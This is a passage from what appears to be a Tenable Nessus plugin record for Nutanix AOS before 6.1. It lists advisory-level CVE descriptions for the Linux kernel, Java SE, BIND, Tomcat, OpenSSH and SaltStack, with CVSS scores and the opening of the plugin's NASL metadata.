(Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N). (CVE-2021-35567)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35578)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n ImageIO). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35586)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Hotspot). Supported versions that are affected are Java SE: 7u311, 8u301; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.1 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L). (CVE-2021-35588)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). (CVE-2021-35603)\n\n - A flaw was found in the Routing decision classifier in the Linux kernel's Traffic Control networking subsystem in the way it handled changing of classification filters, leading to a use-after-free condition.\n This flaw allows unprivileged local users to escalate their privileges on the system. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3715)\n\n - An issue was discovered in the Linux kernel before 5.2.6. On NUMA systems, the Linux fair scheduler has a use-after-free in show_numa_stats() because NUMA fault statistics are inappropriately freed, aka CID-16d51a590a8c. (CVE-2019-20934)\n\n - In the Linux kernel before 5.6.1, drivers/media/usb/gspca/xirlink_cit.c (aka the Xirlink camera USB driver) mishandles invalid descriptors, aka CID-a246b4d54770. (CVE-2020-11668)\n\n - The Linux kernel before 5.11.14 has a use-after-free in cipso_v4_genopt in net/ipv4/cipso_ipv4.c because the CIPSO and CALIPSO refcounting for the DOI definitions is mishandled, aka CID-ad5d07f4a9cd. This leads to writing an arbitrary value. (CVE-2021-33033)\n\n - In the Linux kernel before 5.12.4, net/bluetooth/hci_event.c has a use-after-free when destroying an hci_chan, aka CID-5c4c8c954409. This leads to writing an arbitrary value. (CVE-2021-33034)\n\n - fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05. (CVE-2021-33909)\n\n - encoding.c in GNU Screen through 4.8.0 allows remote attackers to cause a denial of service (invalid write access and application crash) or possibly have unspecified other impact via a crafted UTF-8 character sequence. (CVE-2021-26937)\n\n - An issue was discovered in the Linux kernel before 5.10. drivers/infiniband/core/ucma.c has a use-after- free because the ctx is reached via the ctx_list in some ucma_migrate_id situations where ucma_close is called, aka CID-f5449e74802c. (CVE-2020-36385)\n\n - A flaw was found in RPM's signature check functionality when reading a package file. This flaw allows an attacker who can convince a victim to install a seemingly verifiable package, whose signature header was modified, to cause RPM database corruption and execute code. The highest threat from this vulnerability is to data integrity, confidentiality, and system availability. (CVE-2021-20271)\n\n - In the Linux kernel before 5.3.9, there are multiple out-of-bounds write bugs that can be caused by a malicious USB device in the Linux kernel HID drivers, aka CID-d9d4b1e46d95. This affects drivers/hid/hid- axff.c, drivers/hid/hid-dr.c, drivers/hid/hid-emsff.c, drivers/hid/hid-gaff.c, drivers/hid/hid-holtekff.c, drivers/hid/hid-lg2ff.c, drivers/hid/hid-lg3ff.c, drivers/hid/hid-lg4ff.c, drivers/hid/hid-lgff.c, drivers/hid/hid-logitech-hidpp.c, drivers/hid/hid-microsoft.c, drivers/hid/hid-sony.c, drivers/hid/hid- tmff.c, and drivers/hid/hid-zpff.c. (CVE-2019-19532)\n\n - In create_pinctrl of core.c, there is a possible out of bounds read due to a use after free. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-140550171 (CVE-2020-0427)\n\n - A flaw was found in the Linux kernel. A use-after-free memory flaw was found in the perf subsystem allowing a local attacker with permission to monitor perf events to corrupt memory and possibly escalate privileges. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2020-14351)\n\n - In the Linux kernel through 5.8.7, local attackers able to inject conntrack netlink configuration could overflow a local buffer, causing crashes or triggering use of incorrect protocol numbers in ctnetlink_parse_tuple_filter in net/netfilter/nf_conntrack_netlink.c, aka CID-1cc5ef91d2ff.\n (CVE-2020-25211)\n\n - A flaw was found in the Linux kernel in versions before 5.9-rc7. Traffic between two Geneve endpoints may be unencrypted when IPsec is configured to encrypt traffic for the specific UDP port used by the GENEVE tunnel allowing anyone between the two endpoints to read the traffic unencrypted. The main threat from this vulnerability is to data confidentiality. (CVE-2020-25645)\n\n - A flaw was found in the Linux kernel. A use-after-free was found in the way the console subsystem was using ioctls KDGKBSENT and KDSKBSENT. A local user could use this flaw to get read memory access out of bounds. The highest threat from this vulnerability is to data confidentiality. (CVE-2020-25656)\n\n - A flaw in ICMP packets in the Linux kernel may allow an attacker to quickly scan open UDP ports. This flaw allows an off-path remote attacker to effectively bypass source port UDP randomization. Software that relies on UDP source port randomization are indirectly affected as well on the Linux Based Products (RUGGEDCOM RM1224: All versions between v5.0 and v6.4, SCALANCE M-800: All versions between v5.0 and v6.4, SCALANCE S615: All versions between v5.0 and v6.4, SCALANCE SC-600: All versions prior to v2.1.3, SCALANCE W1750D: v8.3.0.1, v8.6.0, and v8.7.0, SIMATIC Cloud Connect 7: All versions, SIMATIC MV500 Family: All versions, SIMATIC NET CP 1243-1 (incl. SIPLUS variants): Versions 3.1.39 and later, SIMATIC NET CP 1243-7 LTE EU: Version (CVE-2020-25705)\n\n - In drivers/target/target_core_xcopy.c in the Linux kernel before 5.10.7, insufficient identifier checking in the LIO SCSI target code can be used by remote attackers to read or write files via directory traversal in an XCOPY request, aka CID-2896c93811e3. For example, an attack can occur over a network if the attacker has access to one iSCSI LUN. The attacker gains control over file access because I/O operations are proxied via an attacker-selected backstore. (CVE-2020-28374)\n\n - A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b.\n (CVE-2020-29661)\n\n - In the Linux kernel 4.14 longterm through 4.14.165 and 4.19 longterm through 4.19.96 (and 5.x before 5.2), there is a use-after-free (write) in the i915_ppgtt_close function in drivers/gpu/drm/i915/i915_gem_gtt.c, aka CID-7dc40713618c. This is related to i915_gem_context_destroy_ioctl in drivers/gpu/drm/i915/i915_gem_context.c. (CVE-2020-7053)\n\n - A flaw was found in the way memory resources were freed in the unix_stream_recvmsg function in the Linux kernel when a signal was pending. This flaw allows an unprivileged local user to crash the system by exhausting available memory. The highest threat from this vulnerability is to system availability.\n (CVE-2021-20265)\n\n - The fix for bug 63362 present in Apache Tomcat 10.1.0-M1 to 10.1.0-M5, 10.0.0-M1 to 10.0.11, 9.0.40 to 9.0.53 and 8.5.60 to 8.5.71 introduced a memory leak. The object introduced to collect metrics for HTTP upgrade connections was not released for WebSocket connections once the connection was closed. This created a memory leak that, over time, could lead to a denial of service via an OutOfMemoryError.\n (CVE-2021-42340)\n\n - A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being called with out-of-range scalers, possibly resulting in incorrect results. This flaw allows an attacker to force an invalid signature, causing an assertion failure or possible validation. The highest threat to this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-20305)\n\n - In BIND 9.8.5 -> 9.8.8, 9.9.3 -> 9.11.29, 9.12.0 -> 9.16.13, and versions BIND 9.9.3-S1 -> 9.11.29-S1 and 9.16.8-S1 -> 9.16.13-S1 of BIND 9 Supported Preview Edition, as well as release versions 9.17.0 -> 9.17.11 of the BIND 9.17 development branch, when a vulnerable version of named receives a malformed IXFR triggering the flaw described above, the named process will terminate due to a failed assertion the next time the transferred secondary zone is refreshed. (CVE-2021-25214)\n\n - ** DISPUTED ** An issue was discovered in the Bidirectional Algorithm in the Unicode Specification through 14.0. It permits the visual reordering of characters via control sequences, which can be used to craft source code that renders different logic than the logical ordering of tokens ingested by compilers and interpreters. Adversaries can leverage this to encode source code for compilers accepting Unicode such that targeted vulnerabilities are introduced invisibly to human reviewers. NOTE: the Unicode Consortium offers the following alternative approach to presenting this concern. An issue is noted in the nature of international text that can affect applications that implement support for The Unicode Standard and the Unicode Bidirectional Algorithm (all versions). Due to text display behavior when text includes left-to- right and right-to-left characters, the visual order of tokens may be different from their logical order.\n Additionally, control characters needed to fully support the requirements of bidirectional text can further obfuscate the logical order of tokens. Unless mitigated, an adversary could craft source code such that the ordering of tokens perceived by human reviewers does not match what will be processed by a compiler/interpreter/etc. The Unicode Consortium has documented this class of vulnerability in its document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode Security Mechanisms, and in Unicode Standard Annex #31, Unicode Identifier and Pattern Syntax. Also, the BIDI specification allows applications to tailor the implementation in ways that can mitigate misleading visual reordering in program text; see HL4 in Unicode Standard Annex #9, Unicode Bidirectional Algorithm.\n (CVE-2021-42574)\n\n - sshd in OpenSSH 6.2 through 8.x before 8.8, when certain non-default configurations are used, allows privilege escalation because supplemental groups are not initialized as expected. Helper programs for AuthorizedKeysCommand and AuthorizedPrincipalsCommand may run with privileges associated with group memberships of the sshd process, if the configuration specifies running the command as a different user.\n (CVE-2021-41617)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions. (CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users. (CVE-2020-11652)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-01T00:00:00", "type": "nessus", "title": "Nutanix AOS : Multiple Vulnerabilities (NXSA-AOS-6.1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4658", "CVE-2017-5715", "CVE-2017-5753", "CVE-2017-5754", "CVE-2019-19532", "CVE-2019-20934", "CVE-2020-0427", "CVE-2020-11651", "CVE-2020-11652", "CVE-2020-11668", "CVE-2020-14351", "CVE-2020-25211", "CVE-2020-25645", "CVE-2020-25656", "CVE-2020-25705", "CVE-2020-27777", "CVE-2020-28374", "CVE-2020-29661", "CVE-2020-36385", "CVE-2020-7053", "CVE-2021-20265", "CVE-2021-20271", "CVE-2021-20305", "CVE-2021-2161", "CVE-2021-2163", "CVE-2021-22543", "CVE-2021-22555", "CVE-2021-2341", "CVE-2021-2369", "CVE-2021-23840", "CVE-2021-23841", "CVE-2021-2388", "CVE-2021-25214", "CVE-2021-25215", "CVE-2021-26937", "CVE-2021-27363", "CVE-2021-27364", "CVE-2021-27365", "CVE-2021-29154", "CVE-2021-29650", "CVE-2021-30640", "CVE-2021-32399", "CVE-2021-33033", "CVE-2021-33034", "CVE-2021-33037", "CVE-2021-33909", "CVE-2021-35550", "CVE-2021-35556", "CVE-2021-35559", "CVE-2021-35561", "CVE-2021-35564", "CVE-2021-35565", "CVE-2021-35567", "CVE-2021-35578", "CVE-2021-35586", "CVE-2021-35588", "CVE-2021-35603", "CVE-2021-3653", "CVE-2021-3656", "CVE-2021-3715", "CVE-2021-37576", "CVE-2021-40438", "CVE-2021-4104", "CVE-2021-41617", "CVE-2021-42340", "CVE-2021-42574", "CVE-2021-43527", "CVE-2021-44832"], "modified": "2023-01-30T00:00:00", "cpe": ["cpe:/o:nutanix:aos"], "id": "NUTANIX_NXSA-AOS-6_1.NASL", "href": "https://www.tenable.com/plugins/nessus/164603", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164603);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/30\");\n\n script_cve_id(\n \"CVE-2016-4658\",\n \"CVE-2017-5715\",\n \"CVE-2017-5753\",\n \"CVE-2017-5754\",\n \"CVE-2019-19532\",\n \"CVE-2019-20934\",\n \"CVE-2020-0427\",\n \"CVE-2020-7053\",\n \"CVE-2020-11651\",\n \"CVE-2020-11652\",\n \"CVE-2020-11668\",\n \"CVE-2020-14351\",\n \"CVE-2020-25211\",\n \"CVE-2020-25645\",\n \"CVE-2020-25656\",\n \"CVE-2020-25705\",\n \"CVE-2020-27777\",\n \"CVE-2020-28374\",\n \"CVE-2020-29661\",\n \"CVE-2020-36385\",\n \"CVE-2021-2161\",\n \"CVE-2021-2163\",\n \"CVE-2021-2341\",\n \"CVE-2021-2369\",\n \"CVE-2021-2388\",\n \"CVE-2021-3653\",\n \"CVE-2021-3656\",\n \"CVE-2021-3715\",\n \"CVE-2021-4104\",\n \"CVE-2021-20265\",\n \"CVE-2021-20271\",\n \"CVE-2021-20305\",\n \"CVE-2021-22543\",\n \"CVE-2021-22555\",\n \"CVE-2021-23840\",\n \"CVE-2021-23841\",\n \"CVE-2021-25214\",\n \"CVE-2021-25215\",\n \"CVE-2021-26937\",\n \"CVE-2021-27363\",\n \"CVE-2021-27364\",\n \"CVE-2021-27365\",\n \"CVE-2021-29154\",\n \"CVE-2021-29650\",\n \"CVE-2021-30640\",\n \"CVE-2021-32399\",\n \"CVE-2021-33033\",\n \"CVE-2021-33034\",\n \"CVE-2021-33037\",\n \"CVE-2021-33909\",\n \"CVE-2021-35550\",\n \"CVE-2021-35556\",\n \"CVE-2021-35559\",\n \"CVE-2021-35561\",\n \"CVE-2021-35564\",\n \"CVE-2021-35565\",\n \"CVE-2021-35567\",\n \"CVE-2021-35578\",\n \"CVE-2021-35586\",\n \"CVE-2021-35588\",\n \"CVE-2021-35603\",\n \"CVE-2021-37576\",\n \"CVE-2021-40438\",\n \"CVE-2021-41617\",\n \"CVE-2021-42340\",\n \"CVE-2021-42574\",\n \"CVE-2021-43527\",\n \"CVE-2021-44832\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0138\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"Nutanix AOS : Multiple Vulnerabilities (NXSA-AOS-6.1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Nutanix AOS host is affected by multiple vulnerabilities .\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of AOS installed on the remote host is prior to 6.1. It is, therefore, affected by multiple vulnerabilities\nas referenced in the NXSA-AOS-6.1 advisory.\n\n - Vulnerability in the Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition product of Oracle Java\n SE (component: Libraries). Supported versions that are affected are Java SE: 7u291, 8u281, 11.0.10, 16;\n Java SE Embedded: 8u281; Oracle GraalVM Enterprise Edition: 19.3.5, 20.3.1.2 and 21.0.0.2. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition. Successful attacks require human\n interaction from a person other than the attacker. Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded,\n Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments\n that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox\n for security. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N). (CVE-2021-2163)\n\n - Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow\n unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.\n (CVE-2017-5715)\n\n - Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized\n disclosure of information to an attacker with local user access via a side-channel analysis.\n (CVE-2017-5753)\n\n - Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow\n unauthorized disclosure of information to an attacker with local user access via a side-channel analysis\n of the data cache. (CVE-2017-5754)\n\n - An issue was discovered in the Linux kernel through 5.11.3. A kernel pointer leak can be used to determine\n the address of the iscsi_transport structure. When an iSCSI transport is registered with the iSCSI\n subsystem, the transport's handle is available to unprivileged users via the sysfs file system, at\n /sys/class/iscsi_transport/$TRANSPORT_NAME/handle. When read, the show_transport_handle function (in\n drivers/scsi/scsi_transport_iscsi.c) is called, which leaks the handle. This handle is actually the\n pointer to an iscsi_transport struct in the kernel module's global variables. (CVE-2021-27363)\n\n - An issue was discovered in the Linux kernel through 5.11.3. drivers/scsi/scsi_transport_iscsi.c is\n adversely affected by the ability of an unprivileged user to craft Netlink messages. (CVE-2021-27364)\n\n - An issue was discovered in the Linux kernel through 5.11.3. Certain iSCSI data structures do not have\n appropriate length constraints or checks, and can exceed the PAGE_SIZE value. An unprivileged user can\n send a Netlink message that is associated with iSCSI, and has a length up to the maximum length of a\n Netlink message. (CVE-2021-27365)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Networking). Supported versions that are affected are Java SE: 7u301, 8u291, 11.0.11, 16.0.1; Oracle\n GraalVM Enterprise Edition: 20.3.2 and 21.1.0. Difficult to exploit vulnerability allows unauthenticated\n attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise\n Edition. Successful attacks require human interaction from a person other than the attacker. Successful\n attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle\n GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability does not apply to Java deployments, typically in servers, that load and run\n only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). (CVE-2021-2341)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Library). Supported versions that are affected are Java SE: 7u301, 8u291, 11.0.11, 16.0.1; Oracle GraalVM\n Enterprise Edition: 20.3.2 and 21.1.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks require human interaction from a person other than the attacker. Successful attacks of\n this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Oracle\n GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability does not apply to Java deployments, typically in servers, that load and run\n only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 4.3 (Integrity impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N). (CVE-2021-2369)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Hotspot). Supported versions that are affected are Java SE: 8u291, 11.0.11, 16.0.1; Oracle GraalVM\n Enterprise Edition: 20.3.2 and 21.1.0. Difficult to exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks require human interaction from a person other than the attacker. Successful attacks of\n this vulnerability can result in takeover of Java SE, Oracle GraalVM Enterprise Edition. Note: This\n vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start\n applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the\n internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java\n deployments, typically in servers, that load and run only trusted code (e.g., code installed by an\n administrator). CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS\n Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H). (CVE-2021-2388)\n\n - NSS (Network Security Services) versions prior to 3.73 or 3.68.1 ESR are vulnerable to a heap overflow\n when handling DER-encoded DSA or RSA-PSS signatures. Applications using NSS for handling signatures\n encoded within CMS, S/MIME, PKCS \\#7, or PKCS \\#12 are likely to be impacted. Applications using NSS for\n certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how\n they configure NSS. *Note: This vulnerability does NOT impact Mozilla Firefox.* However, email clients and\n PDF viewers that use NSS for signature verification, such as Thunderbird, LibreOffice, Evolution and\n Evince are believed to be impacted. This vulnerability affects NSS < 3.73 and NSS < 3.68.1.\n (CVE-2021-43527)\n\n - xpointer.c in libxml2 before 2.9.5 (as used in Apple iOS before 10, OS X before 10.12, tvOS before 10, and\n watchOS before 3, and other products) does not forbid namespace nodes in XPointer ranges, which allows\n remote attackers to execute arbitrary code or cause a denial of service (use-after-free and memory\n corruption) via a crafted XML document. (CVE-2016-4658)\n\n - A flaw was found in the way RTAS handled memory accesses in userspace to kernel communication. On a locked\n down (usually due to Secure Boot) guest system running on top of PowerVM or KVM hypervisors (pseries\n platform) a root like local user could use this flaw to further increase their privileges to that of a\n running kernel. (CVE-2020-27777)\n\n - A heap out-of-bounds write affecting Linux since v2.6.19-rc1 was discovered in net/netfilter/x_tables.c.\n This allows an attacker to gain privileges or cause a DoS (via heap memory corruption) through user name\n space (CVE-2021-22555)\n\n - BPF JIT compilers in the Linux kernel through 5.11.12 have incorrect computation of branch displacements,\n allowing them to execute arbitrary code within the kernel context. This affects\n arch/x86/net/bpf_jit_comp.c and arch/x86/net/bpf_jit_comp32.c. (CVE-2021-29154)\n\n - An issue was discovered in the Linux kernel before 5.11.11. The netfilter subsystem allows attackers to\n cause a denial of service (panic) because net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h\n lack a full memory barrier upon the assignment of a new table value, aka CID-175e476b8cdf.\n (CVE-2021-29650)\n\n - net/bluetooth/hci_request.c in the Linux kernel through 5.12.2 has a race condition for removal of the HCI\n controller. (CVE-2021-32399)\n\n - Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66 did not correctly parse the HTTP\n transfer-encoding request header in some circumstances leading to the possibility to request smuggling\n when used with a reverse proxy. Specifically: - Tomcat incorrectly ignored the transfer encoding header if\n the client declared it would only accept an HTTP/1.0 response; - Tomcat honoured the identify encoding;\n and - Tomcat did not ensure that, if present, the chunked encoding was the final encoding.\n (CVE-2021-33037)\n\n - In BIND 9.0.0 -> 9.11.29, 9.12.0 -> 9.16.13, and versions BIND 9.9.3-S1 -> 9.11.29-S1 and 9.16.8-S1 ->\n 9.16.13-S1 of BIND Supported Preview Edition, as well as release versions 9.17.0 -> 9.17.11 of the BIND\n 9.17 development branch, when a vulnerable version of named receives a query for a record triggering the\n flaw described above, the named process will terminate due to a failed assertion check. The vulnerability\n affects all currently maintained BIND 9 branches (9.11, 9.11-S, 9.16, 9.16-S, 9.17) as well as all other\n versions of BIND 9. (CVE-2021-25215)\n\n - Vulnerability in the Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition product of Oracle Java\n SE (component: Libraries). Supported versions that are affected are Java SE: 7u291, 8u281, 11.0.10, 16;\n Java SE Embedded: 8u281; Oracle GraalVM Enterprise Edition: 19.3.5, 20.3.1.2 and 21.0.0.2. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition. Successful attacks of this\n vulnerability can result in unauthorized creation, deletion or modification access to critical data or all\n Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability\n applies to Java deployments that load and run untrusted code (e.g., code that comes from the internet) and\n rely on the Java sandbox for security. It can also be exploited by supplying untrusted data to APIs in the\n specified Component. CVSS 3.1 Base Score 5.9 (Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N). (CVE-2021-2161)\n\n - Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are\n vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI\n LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by\n limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.\n (CVE-2021-44832)\n\n - An issue was discovered in Linux: KVM through Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass\n RO checks and can lead to pages being freed while still accessible by the VMM and guest. This allows users\n with the ability to start and control a VM to read/write random pages of memory and can result in local\n privilege escalation. (CVE-2021-22543)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when\n processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested\n guest (L2). Due to improper validation of the int_ctl field, this issue could allow a malicious L1 to\n enable AVIC support (Advanced Virtual Interrupt Controller) for the L2 guest. As a result, the L2 guest\n would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak\n of sensitive data or potential guest-to-host escape. This flaw affects Linux kernel versions prior to\n 5.14-rc7. (CVE-2021-3653)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when\n processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested\n guest (L2). Due to improper validation of the virt_ext field, this issue could allow a malicious L1 to\n disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the\n L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire\n system, leak of sensitive data or potential guest-to-host escape. (CVE-2021-3656)\n\n - arch/powerpc/kvm/book3s_rtas.c in the Linux kernel through 5.13.5 on the powerpc 